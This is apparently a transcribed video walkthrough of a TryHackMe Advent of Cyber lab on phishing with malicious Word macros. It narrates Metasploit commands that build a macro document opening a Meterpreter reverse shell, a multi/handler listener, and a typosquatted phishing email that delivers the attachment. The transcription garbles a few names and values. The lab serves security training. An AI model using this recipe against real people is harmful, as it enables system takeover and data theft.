All right, so everybody, this is a guided walkthrough for the TryHackMe Advent of Cyber event, day number 10, otherwise known as Task 16. The theme of today's exercise is phishing. So let's get started. All right, so we were going to get started, and I'm going to go over the story for today's event. Mayor Malware had just one sock miss wish. The sock organizer would fall for his fish. Well, on top of this, he wanted as well, once the email opened, to gain a rev shell. Mayor Malware attempts to phish one of the sock miss organizers by sending a document embedded with a malicious macro. Once opened, the macro will execute, giving the mayor remote access to the organizer's system. Marta May Ware is surprised that her system was compromised even after following tight security, but McSkitty thinks she traced the attacker and he got in. It's none other than Mayor Malware who got into the system. This time, the mayor used phishing to get his victim. McSkitty's quick incident response prevented significant damage. In this task, you will run a security assessment against Marta May Ware. The purpose would be to improve her security and raise her cybersecurity awareness against future attacks. Glitch is still concerned about any future attack on Marta May Ware and advises McSkitty to run a phishing exercise on her to verify whether she is vigilant about these attacks. So what are we going to be learning today? Our learning objectives are understanding how phishing attacks work, discovering how macros and documents can be used and abused, and learning how to carry out a phishing attack with a macro. So let's talk about phishing attacks. Security is as strong as the weakest link. Many would argue that humans are the weakest link in the security chain. It is easier to exploit a patch system Is it easier to patch and exploit is it easier to exploit a patch system behind a firewall or to convince a user to open an important document? Hence, human hacking is usually the easiest to accomplish and falls under social engineering. Phishing is a play on the word fishing. However, the attacker is not after seafood. Phishing works by sending a bait to a usually large group of target users. Furthermore, the attacker often crafts their messages with a sense of urgency, prompting target users to take immediate action without thinking critically, increasing the chances of success. The purpose is to steal personal information or install malware, usually by convincing the target to fill out a form, open a file, or click on a link. One might get an email out of nowhere claiming that they are being charged a hefty sum and that they should check the details in the attached file or URL. The attacker just needs to have their target users open the malicious file or view the malicious link. This can trigger specific actions that would give the attack control over your system. Macros. The needs of MS Office users can be vastly different, and there is no way that a default installation would cater to all these needs. In particular, some users find themselves repeating the same tasks, such as formatting and inserting text or performing calculations. Consider the example of number-to-words conversion, where a number such as 1337 needs to be expressed as 1337. It would take hours to finish if you had hundreds of numbers to convert. Hence, there is a need for an automated solution to save time and reduce manual effort. In computing, a macro refers to a set of programmed instructions designed to automate repetitive tasks. MS Word, among other MS Office products, supports adding macros to documents. In many cases, these macros can be a tremendous time-saving feature. However, in cybersecurity, these automated programs can be hijacked for malicious purposes. To add a macro to an MS document, for instance, we click on the View menu, then select Macros as pointed out by 1 and 2 in the screenshot below. Okay, so we've got View and Macros over here. We should specify the name of the macro and specify that we want to save it in our current document, as indicated by 3 and 4. So after we open up the window, there's my macro, this name, and we need to set this as document number 1, I guess the name of the document. And then after that, we would click on the create button to create the macro. And finally, we press the create button. Okay, great. Let's explore one way the attacker could create an MS Word document with an embedded macro to gain access to MARTA's system. What is the attack plan? In his plans, Mayor Malware needs to create a document with a malicious macro. Upon opening the document, the macro will execute a payload and connect to the mayor's machine, giving him remote control. Consequently, the mayor needs to ensure that he is listening for incoming connections on his machine before emailing the malicious document to Marta May Ware. By executing the macro, the mayor gains remote access to Marta's system through a reverse shell, allowing him to execute commands and control her machine remotely. The steps are as follows. 1. Create a document with the malicious macro. 2. Start listening for incoming connections to the attacker's system. 3. Email the document and wait for the target user to open it. 4. The target user opens the document and connects to the attacker's system. 5. Control the target user's system. You might wonder why you don't set the malicious macros so that you can connect to the target system directly instead of the other way around. The reason is when the target system is behind a firewall or has private IP address, you cannot reach it and hence cannot connect to it. Connecting to the machine. Before moving forward, review the questions in the connection card below. So, do we need to start the attack box today? Yes. Do we need to start a VM today? Yes. All right, so let's press the Start Machine button to prepare the mail server. So we're going to click on this green button over here to start the machine associated with today's task. And then after we do that, we're going to scroll up to the top of the web page to start up the attack box. So underneath this logo over here for Advent of Cyber 2024, there's going to be a button labeled Start Attack Box. So go ahead and click on that. And then we're going to scroll down. We're going to scroll down back to where we were in day 10. Okay. So our attack box is starting up over here. It's going to take about 2 minutes for the machine to initialize. So we need to wait for this to finish initializing before we can interact with the system. But before that, let's take a look at what we're going to be doing in today's task. So on the attacker system, we're going to be doing the following. On the attack box, you need to carry out 2 steps. We need to create a document with an embedded malicious macro, and then we need to listen for incoming connections. So the first thing we want to do is we want to create the malicious document. The first step would be to embed a malicious macro within the document. Alternatively, you can use the Metasploit framework to create such a document, as this would spare us the need for a system with MS Office. So the attack box does not have MS Office installed, so what we're going to be doing is we're going to use the Metasploit framework to create this document for us. You will use the Metasploit framework to create the document with the malicious macro. This requires the following commands. So what we need to do is you need to open a terminal window and run msf console to start the Metasploit framework. Okay, so we need to wait on the attack box to finish initializing before we can take the next step. Okay, so we see here that the attack box machine has finished initializing. So what we want to do is we want to dismiss this terminal window here, and we can do that by clicking into the window and then hitting the Enter key to dismiss the window. All right, so we also want to start up our own terminal window, and we can just double click on this shortcut over here, start up a terminal window. So we've got a terminal window over here. What we need to do is we need to run the msf console command to start up the Metasploit framework. So we're just going to do that. MSF console, hit enter. So it's going to take a few moments for this to finish loading up. The first thing we're going to do inside the framework is we're going to give this command over here. Set payload Windows interpreter reverse TCP. And this is going to specify the payload to use. And in this case, it's going to connect to a specified host and create a reverse shell. So we're going to copy this command over here. And I'm not sure if we can paste this directly into the console or not. We're going to find out in a little bit. We just need to wait for the Metasploit framework console to finish loading up. Okay, and I think we are finished loading. So I'm just going to try to determine if we can paste into here. Can we paste? No, we cannot paste. Okay, so this is what we're going to do. So after you copy the command over here, what we're going to do is we're going to open up the little control bar over here, and then we're going to click on the clipboard. In the clipboard over here, we're going to paste in the command that we want to run, and then we're going to highlight it, and then we're going to close the clipboard. And then now we can click into our terminal window and paste in our command over here. So the command is set payload Windows interpreter reverse TCP. Hit enter to give that command. And the next command is going to be this one over here. So use exploit multi file format Office Word macro. So this this module over here is going to specify the exploit you want to use. Technically speaking, this is not an exploit. It is a module to create a document with a macro. So go ahead and copy the command over here, and then we're going to go over to our control bar. We're going to replace the previous clipboard with this command over here, and then highlight it. And then inside the Metasploit framework, click in there, paste in the command, and then hit enter. Okay, so after that, we're going to set our configuration for the for this exploit. So the first thing we need to do is we need to set the IP address that's going to be contacted by the macro. And this is going to specify the IP address of the attacker system. The attacker system is the attack box system over here, and we have the IP address 10.10.557. You are probably not going to have the same IP address, but it's going to be different for everybody. So we're going to highlight this command and copy it, and then we're going to paste into our clipboard here. Then we're going to paste in the command over here, and then hit enter. All right. And then the next command is set lport 8888. This is going to specify the port number that you're going to listen on for incoming connections on the attack box. So we're going to set this. We're just going to type it in manually. It's not very long. Set lport space 8888 and then hit enter. Okay, then we're going to show options, and it's going to show the configuration options to ensure that everything has been set properly. So for example, the IP address and the port number in this example. So we're going to show options, and we need to set these things. Required, yes. All right, lport is correct, yes. lhost is correct, yes. lport is correct. Okay, great. I think we're ready. So the next command we're going to give is this exploit one. So it's going to generate the macro and embed it in the document. So this command is going to create the document. So you can do the exploit command. You can also use the run command. But exploit is more dramatic, so I guess we're going to use the exploit command. Hit enter. And then it's going to take, that didn't take as long as I thought it would take. All right, so we have the malicious Microsoft Office document over here. It's msf.docm, and they wrote it into our attack box's directory over here at root.msf4 local mss.docm. Okay, the last command we're going to give is exit to quit and return to the terminal. So we're just going to give the exit command like this. Okay, so what we need to do is we need to copy. So we're going to be using this this document in a little bit. So what we're going to do is we're going to copy this file path here, and then we're going to copy it to our current directory. So the current directory is root, and we're just going to use the copy command cp, and then paste in the file path there, and then we're going to use the dot afterwards to create this file, to copy this file to our current directory. So after we give that command, we see that the msf.docm file has been copied over to our current directory. So remember that this is the malicious MS Office file with the macro installed. Okay. In the terminal below, you can see the execution of the above steps. So we've already done all this here. So let's just scroll on by. So the created macro enabled document over here, we mentioned earlier how to create a macro within a MS Word document. You might be interested to see the contents of the file created by MSF console. In the screenshot below, we can see the different procedures and functions that make up this macro. The attack box doesn't have MS Office installed, for this section, you only need to read along. Okay, so the macro is over here. I think I can make this this larger over here. Yeah. Okay. So this is an example of what the macro looks like inside the MS Office document over here. So we're just going to read along to see what this macro does. So we've got auto open. This triggers the macro automatically when a Word document is opened. It searches through the document's properties, looks for content in the comments field. The data saved using base64 encoding in the comments field is actually the payload. So the second thing it does is this base64 function. It converts the payload to its original form. In this case, it is an executable MS Windows file. And then it will do 3, execute for Windows. It's going to execute the payload in a temporary directory. It connects to the specific attacker's system IP address and port. The comments field is shown in the screenshot below. It is close to 100,000 characters in our case. So the macro, I think it's the macro that is 100,000 characters, or it might be the payload. So if you copy it and save it to a text file, you can convert it back to its original executable format using base64 as shown below. You can notice the size of the files. So over here, we're talking about the payload that is being executed. We're not going to illustrate this. You already expect this file to be connected to these. You already expect this file to connect to the specified IP address and port. If you would like to check its behavior in a sandbox, you can check the virus total report for a file that we created and uploaded. In this case, it attempts to connect to this IP address right here. And this is an example of the summary of this particular payload in the virus total website over here. So it processes created, shell commands, process tree. Okay. So it tries to connect via Metasploit, I guess, using this IP address right here on this port. All right. So next we're going to be listening for incoming connections. We will again use the Metasploit framework, but this time to listen for incoming connections when a target user opens our phishing Word document. This requires the following commands. Open a new terminal window and run MSF console to start the Metasploit framework. Okay, so in the attack box here, we're just going to clear the terminal, and then we're going to we're going to run the MSF console command again. Okay, so we're just going to wait for that to run, but in the meantime, let's read about what other commands we're going to run here. It says use multi-handler to handle incoming connections. And then we're going to set the payload to Windows Interpreter versus TCP to ensure that our payload works with the payload used when creating the malicious macro. So we need to set up the listener over here inside of Metasploit. And we're going to, first of all, use this command here, use multi/handler. And that's going to switch us over to the this is going to switch us over to the listener handler over here. All right, so next we're going to set payload windows / interpreter / reverse _ TCP, and then give that command. And then we're going to set our lhost to the attacker system over here. So this is the IP address of our attack box, set lhost, and then the IP of the attack box. So let's do that. Set lhost 10.10. Okay, and then we do that. And then we have to set our listening port. So the listening port is going to be port 8888 on our attack box system. So we're going to do set L port 8888 and then hit enter. Okay. We're going to show options like we did last time just to make sure that all of our options are set up correctly. So we're going to show options. Okay. So our L host is correct. Okay. And our L port is correct. All right. I think we're ready to go. So after we set up our listener over here, we need to use the exploit command to start listening for incoming connections to establish a reverse shell. So we're going to give the exploit command here, hit enter, and then it's going to tell us started reverse TCP handler on this IP right here on this port number. So the next thing we need to do is we need to email the malicious document. The malicious document has been created. All you need to do is send it to the target user. It is time to send an email to the target user, marta@sockness.thm. Mayor Malware has prepared the following credentials. So we've got an email address over here, info@socknas.thm, and a password, Mary Fishmas. Notice how Mayor Malware uses a domain name that looks similar to the target users. This technique is known as typo squatting, where attackers create domain names that are nearly identical to legitimate ones in order to trick victims. On the attack box, start the Firefox web browser and head to this URL over here. Use the above credentials to log in. So what we're going to do is we're going to highlight this IP address and copy it. And then over in our control panel, we're going to go to the clipboard, get rid of what's already there, paste in the IP address, and then close the clipboard. And then we're going to start up the attack box's Firefox browser, which we can do by clicking on this button right here. So at the top of the screen, you should see the Firefox logo. Go ahead and click on that. And it should take a few moments for the attack box's web browser to start up. Okay, so after it started up, in the address bar here, we're going to click into it, and we're going to replace what's already there with this IP address. After we've done that, hit enter, and then we're going to need to log into the application. So we're going to use these credentials here to log in. info@sockness.thm, and the password is Mary Fishmas, exclamation point. Okay, then we click on login. Okay, so from here, this is like any web-based email client. What we're going to do is we're going to create a new email here. So this button over here, new message, and we're going to send it to marta@sockmiss.thm. So that is marta@sockmiss.thm. Okay. So for the subject, we're going to emulate an actual phishing email. It's going to say something like urgent action is required. Please respond immediately. Okay. And in the body of the email here, we're going to type in HackerFrogs like and subscribe. Okay. And afterwards, we need to send the we need to attach the malicious document to this phishing email. Okay, so this button over here is going to let us attach document, and it says no attachments here. I think we can attach a document. Let's see. I'm going to make this this window a little smaller so we can see some extra buttons. Okay, so now we can see the extra button here, and this button lets us attach files. So I was able to see this because I needed to make the window smaller, and the keyboard shortcut for that is Control minus, just in case you want to know. Okay, so hit this button over here to attach the files, and we're just going to go over to our root, our home directory here. And in the home directory, there's this file that we copied over, which is called msf.docm. So go ahead and click on that. And I guess what we need to do is to double click on it. So click on that and then click on this button over here, which is going to open the document. Okay, so now the document is attached. So all we need to do is send the send this email with this button right over here. So it's this green button, it says send, click on it. Okay, so now our email has been sent, and we're going to minimize our web browser here. Okay, so so we already sent off the malicious email over here. So exploitation. If everything works out, you will get a reverse shell after about 2 minutes. You can access the files and folders on the target system via the command line. You can use cat to display any text file. Okay, so we're just going to wait for the reverse shell connection to come back to us. And we should see something that looks kind of like this. Sending stage, something, something. And it's going to be coming from the email server that we sent our email to. So just going to wait a little bit. I guess in the meantime we can take a look at more birds. Just gonna let's see. So okay, it came back. So sending stage, these number of bytes from the target system over there. It says Meterpreter session 1 opened. Okay, so this is our own attack box over here that is reaching out to the vulnerable server over here. It has a timestamp, and what we need to do now is we need to drop into our reverse shell from Meterpreter. So we just need to give the shell command over here. So after that, we see that we are in the C Windows System32 directory. So what we're going to do is we're going to move into the administrators directory. So we're going to cd c backspace users / administrator / desktop. And this is where the flag file we need to access is going to be. Okay, so if we do dir after this, we're going to see that there is a flag file here, flag.txt. We need to read this file in order to complete the exercise. So we're just going to use this command type space flag.txt, and this is the contents of the flag. We need to copy this. So we're just going to copy this. Okay, so let's continue. All right, so what we need to do is we need to copy this over to our to our questions over here. So we're going to click on this control bar, click on the clipboard, and we're going to copy what's on the clipboard here. Afterwards, we're going to close out the control bar, and it asks us what is the flag value inside the flag.txt file that's located on the administrator's desktop. We're going to click in here and paste in this answer, submit it, and that is the correct answer. All right, so the last thing we need to do is we need to just click on this button here. It says, if you enjoyed this task, feel free to check out our phishing module. All right, and they've got a link to the phishing module on TryHackMe. We just need to click on complete, and the whole task turns green, which means we have finished the room. Thank you very much for watching this guided walkthrough for TryHackMe's Advent of Cyber event 2024. Day 10. Thank you very much for watching, and we will see you next time.
Hey there, HackerFrogs! Are you enjoying this workshop? Learning new concepts and skills? If so, there's a way you can support the channel, and it's totally free. Just click on the subscribe button below the video. Also, click on the like button. And if you have questions or comments on this workshop, please leave them below the video. Thanks for listening. And now, back to our scheduled programming.